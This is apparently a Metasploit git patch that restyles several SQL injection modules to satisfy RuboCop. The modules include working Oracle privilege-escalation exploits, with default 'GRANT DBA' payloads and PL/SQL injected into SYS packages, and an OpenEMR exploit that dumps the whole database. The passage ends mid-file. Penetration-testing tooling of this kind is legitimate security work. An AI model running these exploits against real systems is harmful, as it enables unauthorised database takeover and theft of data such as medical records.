From c3f5aa41dcd0794d0cb2caaa70df95c96acc8942 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sat, 10 May 2025 16:11:25 +1000 Subject: [PATCH] modules/auxiliary/sqli: Resolve RuboCop violations --- .../sqli/openemr/openemr_sqli_dump.rb | 51 ++++++------ .../sqli/oracle/dbms_cdc_ipublish.rb | 46 ++++++----- .../auxiliary/sqli/oracle/dbms_cdc_publish.rb | 57 ++++++++------ .../sqli/oracle/dbms_cdc_publish2.rb | 62 ++++++++------- .../sqli/oracle/dbms_cdc_publish3.rb | 57 ++++++++------ ...bms_cdc_subscribe_activate_subscription.rb | 51 +++++++----- .../sqli/oracle/dbms_export_extension.rb | 69 +++++++++------- .../oracle/dbms_metadata_get_granted_xml.rb | 49 +++++++----- .../sqli/oracle/dbms_metadata_get_xml.rb | 49 +++++++----- .../sqli/oracle/dbms_metadata_open.rb | 51 ++++++------ .../sqli/oracle/droptable_trigger.rb | 78 ++++++++++--------- .../auxiliary/sqli/oracle/jvm_os_code_10g.rb | 66 +++++++++------- .../auxiliary/sqli/oracle/jvm_os_code_11g.rb | 48 +++++++----- .../sqli/oracle/lt_compressworkspace.rb | 54 +++++++------ .../sqli/oracle/lt_findricset_cursor.rb | 61 ++++++++------- .../sqli/oracle/lt_mergeworkspace.rb | 66 +++++++++------- .../sqli/oracle/lt_removeworkspace.rb | 66 +++++++++------- .../sqli/oracle/lt_rollbackworkspace.rb | 65 +++++++++------- 18 files changed, 595 insertions(+), 451 deletions(-) diff --git a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb index a00cd77c3769..419d302dc7c1 100644 --- a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb +++ b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb @@ -10,29 +10,36 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::SQLi def initialize(info = {}) - super(update_info(info, - 'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump', - 'Description' => ' - This module exploits a SQLi vulnerability found in - OpenEMR version 5.0.1 Patch 6 and lower. The - vulnerability allows the contents of the entire - database (with exception of log and task tables) to be - extracted. - This module saves each table as a `.csv` file in your - loot directory and has been tested with - OpenEMR 5.0.1 (3). - ', - 'License' => MSF_LICENSE, - 'Author' => - [ + super( + update_info( + info, + 'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump', + 'Description' => %q{ + This module exploits a SQLi vulnerability found in + OpenEMR version 5.0.1 Patch 6 and lower. The + vulnerability allows the contents of the entire + database (with exception of log and task tables) to be + extracted. + This module saves each table as a `.csv` file in your + loot directory and has been tested with + OpenEMR 5.0.1 (3). + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Will Porter ' ], - 'References' => [ - ['CVE', '2018-17179'], - ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617'] - ], - 'DisclosureDate' => '2019-05-17' - )) + 'References' => [ + ['CVE', '2018-17179'], + ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617'] + ], + 'DisclosureDate' => '2019-05-17', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) register_options( [ @@ -93,7 +100,7 @@ def save_csv(data, table) # Use the same gsub pattern as store_loot # this will put the first 8 safe characters of the tablename # in the filename in the loot directory - safe_table = table.gsub(/[^a-z0-9\.\_]+/i, '') + safe_table = table.gsub(/[^a-z0-9._]+/i, '') store_loot( "openemr.#{safe_table}.dump", 'application/CSV', diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 72723e8c5bc7..a3a583e07454 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -7,35 +7,43 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE', - 'Description' => %q{ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE', + 'Description' => %q{ The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2008-3996' ], [ 'OSVDB', '49321'] ], - 'DisclosureDate' => '2008-10-22')) + 'DisclosureDate' => '2008-10-22', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ] + ) end - def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) function = " CREATE OR REPLACE FUNCTION #{name} @@ -55,13 +63,13 @@ def run clean = "DROP FUNCTION #{name}" begin - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) - rescue => e + rescue StandardError return end - print_status("Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...") + print_status('Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...') prepare_exec(package) print_status("Done! Removing function '#{name}'...") diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index c34e0f6ed3d6..8d330d84bca2 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -7,35 +7,44 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE', - 'Description' => %q{ - The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege - on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. - Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. - Fixed with October 2008 CPU. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE', + 'Description' => %q{ + The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. + Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. + Fixed with October 2008 CPU. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2008-3995' ], [ 'OSVDB', '49320'] ], - 'DisclosureDate' => '2008-10-22')) + 'DisclosureDate' => '2008-10-22', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) function = " CREATE OR REPLACE FUNCTION #{name} @@ -57,12 +66,12 @@ def run clean = "DROP FUNCTION #{name}" begin - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) - rescue => e + rescue StandardError return end - print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE...") + print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE...') prepare_exec(package) print_status("Done! Removing function '#{name}'...") diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 80bde5ae4099..f21f38d1b0fc 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -7,36 +7,45 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE', - 'Description' => %q{ - The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege - on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE', + 'Description' => %q{ + The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2010-0870' ], [ 'OSVDB', '63772'], [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ] ], - 'DisclosureDate' => '2010-04-26')) + 'DisclosureDate' => '2010-04-26', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - var1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - var2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) + var1 = Rex::Text.rand_text_alpha_upper(1..10) + var2 = Rex::Text.rand_text_alpha_upper(1..10) function = " CREATE OR REPLACE FUNCTION #{name} @@ -56,10 +65,10 @@ def run END; " - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package) + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package) - encoded_sql = %Q| + encoded_sql = %| DECLARE #{var1} VARCHAR2(32767); #{var2} VARCHAR2(32767); @@ -71,9 +80,8 @@ def run END; | - print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...") + print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...') prepare_exec(encoded_sql) - print_status("Done...") - + print_status('Done...') end end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 4d62c77da9d9..46ab76153873 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -7,37 +7,45 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET', - 'Description' => %q{ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET', + 'Description' => %q{ The module exploits an sql injection flaw in the CREATE_CHANGE_SET - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege - on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2010-2415' ], [ 'OSVDB', '70078'], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html' ], ], - 'DisclosureDate' => '2010-10-13')) + 'DisclosureDate' => '2010-10-13', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) register_options( [ OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), - ]) + ] + ) end def run + return if !check_dependencies - return if not check_dependencies - - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - var1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - var2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) + var1 = Rex::Text.rand_text_alpha_upper(1..10) + var2 = Rex::Text.rand_text_alpha_upper(1..10) function = " CREATE OR REPLACE FUNCTION #{name} @@ -51,7 +59,7 @@ def run END; " - #PROCEDURE CREATE_CHANGE_SET + # PROCEDURE CREATE_CHANGE_SET # Argument Name Type In/Out Default? # ------------------------------ ----------------------- ------ -------- # CHANGE_SET_NAME VARCHAR2 IN @@ -67,10 +75,10 @@ def run END; " - uno = Rex::Text.encode_base64(function) - dos = Rex::Text.encode_base64(package) + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package) - encoded_sql = %Q| + encoded_sql = %| DECLARE #{var1} VARCHAR2(32767); #{var2} VARCHAR2(32767); @@ -82,9 +90,8 @@ def run END; | - print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET...") + print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET...') prepare_exec(encoded_sql) - print_status("Done...") - + print_status('Done...') end end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index 5744a36ef9df..4e9c07713d16 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -7,40 +7,48 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION', - 'Description' => %q{ - This module will escalate an Oracle DB user to DBA by exploiting a sql injection - bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. - This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and - 10g up to 10.1.0.4. - }, - 'Author' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION', + 'Description' => %q{ + This module will escalate an Oracle DB user to DBA by exploiting a sql injection + bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. + This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and + 10g up to 10.1.0.4. + }, + 'Author' => [ 'Esteban Martinez Fayo', # Vulnerability discovery and exploit - 'juan vazquez' # Metasploit module + 'juan vazquez' # Metasploit module ], - 'License' => MSF_LICENSE, - 'References' => - [ + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2005-4832'], [ 'BID', '13236' ], [ 'OSVDB', '15553' ], [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2005-02.html'], [ 'URL', 'http://www.argeniss.com/research/OraDBMS_CDC_SUBSCRIBEExploit.txt'] ], - 'DisclosureDate' => '2005-04-18')) + 'DisclosureDate' => '2005-04-18', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(1..10) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 @@ -59,13 +67,14 @@ def run clean = "drop function #{name}" - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) begin - print_status("Attempting sql injection on SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION...") + print_status('Attempting sql injection on SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION...') prepare_exec(injection) rescue ::OCIError => e + vprint_error(e.message) ensure print_status("Removing function '#{name}'...") prepare_exec(clean) diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index 1537e2a6d2a1..159a135a6677 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -7,47 +7,56 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION', - 'Description' => %q{ - This module will escalate an Oracle DB user to DBA by exploiting a - sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. - - Note: This module has been tested against 9i, 10gR1 and 10gR2. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION', + 'Description' => %q{ + This module will escalate an Oracle DB user to DBA by exploiting a + sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. + + Note: This module has been tested against 9i, 10gR1 and 10gR2. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'CVE', '2006-2081' ], [ 'OSVDB', '25002' ], [ 'BID', '17699' ], [ 'URL', 'http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html' ], ], - 'DisclosureDate' => '2006-04-26')) - - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), - ]) + 'DisclosureDate' => '2006-04-26', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) - rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(1..10) + rand1 = Rex::Text.rand_text_alpha_upper(1..10) + rand2 = Rex::Text.rand_text_alpha_upper(1..10) + rand3 = Rex::Text.rand_text_alpha_upper(1..10) - package = %Q| + package = %| create or replace package #{name} authid current_user is function ODCIIndexGetMetadata (oindexinfo sys.odciindexinfo,P3 varchar2,p4 varchar2,env sys.odcienv) return number; end; | - body = %Q| + body = %| create or replace package body #{name} is function ODCIIndexGetMetadata (oindexinfo sys.odciindexinfo,P3 varchar2,p4 varchar2,env sys.odcienv) return number is @@ -60,7 +69,7 @@ def run end; | - sploit = %Q| + sploit = %| declare #{rand1} pls_integer; #{rand2} number; @@ -71,7 +80,7 @@ def run end; | - encoded_package = %Q| + encoded_package = %| declare #{rand1} varchar2(32767); begin @@ -80,7 +89,7 @@ def run end; | - encoded_body = %Q| + encoded_body = %| declare #{rand2} varchar2(32767); begin @@ -89,7 +98,7 @@ def run end; | - encoded_sploit = %Q| + encoded_sploit = %| declare #{rand3} varchar2(32767); begin @@ -105,7 +114,7 @@ def run print_status("Sending body '#{name}'...") prepare_exec(encoded_body) - print_status("Attempting sql injection on SYS.DBMS_EXPORT_EXTENSION...") + print_status('Attempting sql injection on SYS.DBMS_EXPORT_EXTENSION...') prepare_exec(encoded_sploit) # Probably should do a 'drop package #{name}' diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index c5a2b24ade6c..2d495622e8e1 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -7,30 +7,39 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML', - 'Description' => %q{ - This module will escalate an Oracle DB user to DBA by exploiting a sql injection - bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML', + 'Description' => %q{ + This module will escalate an Oracle DB user to DBA by exploiting a sql injection + bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'URL', 'http://www.metasploit.com' ], ], - 'DisclosureDate' => '2008-01-05')) + 'DisclosureDate' => '2008-01-05', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(1..10) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 @@ -45,13 +54,13 @@ def run clean = "drop function #{name}" - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) begin - print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...") + print_status('Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...') prepare_exec(package) - rescue ::OCIError => e + rescue ::OCIError print_status("Removing function '#{name}'...") prepare_exec(clean) end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index fef4023c3372..261ea7fcaaa0 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -7,30 +7,39 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML', - 'Description' => %q{ - This module will escalate an Oracle DB user to DBA by exploiting a sql injection - bug in the SYS.DBMS_METADATA.GET_XML package/function. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML', + 'Description' => %q{ + This module will escalate an Oracle DB user to DBA by exploiting a sql injection + bug in the SYS.DBMS_METADATA.GET_XML package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'URL', 'http://www.metasploit.com' ], ], - 'DisclosureDate' => '2008-01-05')) + 'DisclosureDate' => '2008-01-05', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(1..10) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 @@ -45,13 +54,13 @@ def run clean = "drop function #{name}" - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) begin - print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...") + print_status('Attempting sql injection on SYS.DBMS_METADATA.GET_XML...') prepare_exec(package) - rescue ::OCIError => e + rescue ::OCIError print_status("Removing function '#{name}'...") prepare_exec(clean) end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index 1e680e477b8f..c0a623ca838c 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -7,30 +7,39 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN', - 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection - bug in the SYS.DBMS_METADATA.OPEN package/function. - }, - 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting an sql injection + bug in the SYS.DBMS_METADATA.OPEN package/function. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'References' => [ [ 'URL', 'http://www.metasploit.com' ], ], - 'DisclosureDate' => '2008-01-05')) + 'DisclosureDate' => '2008-01-05', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options( - [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), - ]) + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ] + ) end def run - return if not check_dependencies + return if !check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(1..10) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 @@ -45,18 +54,16 @@ def run clean = "drop function #{name}" - - print_status("Sending function...") + print_status('Sending function...') prepare_exec(function) begin - print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...") + print_status('Attempting sql injection on SYS.DBMS_METADATA.OPEN...') prepare_exec(package) rescue ::OCIError => e - if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ ) + if (e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/) print_status("Removing function '#{name}'...") prepare_exec(clean) - else end end end diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 2b7e4821885f..0f4affbb504c 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -7,51 +7,59 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT def initialize(info = {}) - super(update_info(info, - 'Name' => 'Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger', - 'Description' => %q{ + super( + update_info( + info, + 'Name' => 'Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger', + 'Description' => %q{ This module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS user by creating evil trigger in system scheme (2-stage attack). - }, - 'Author' 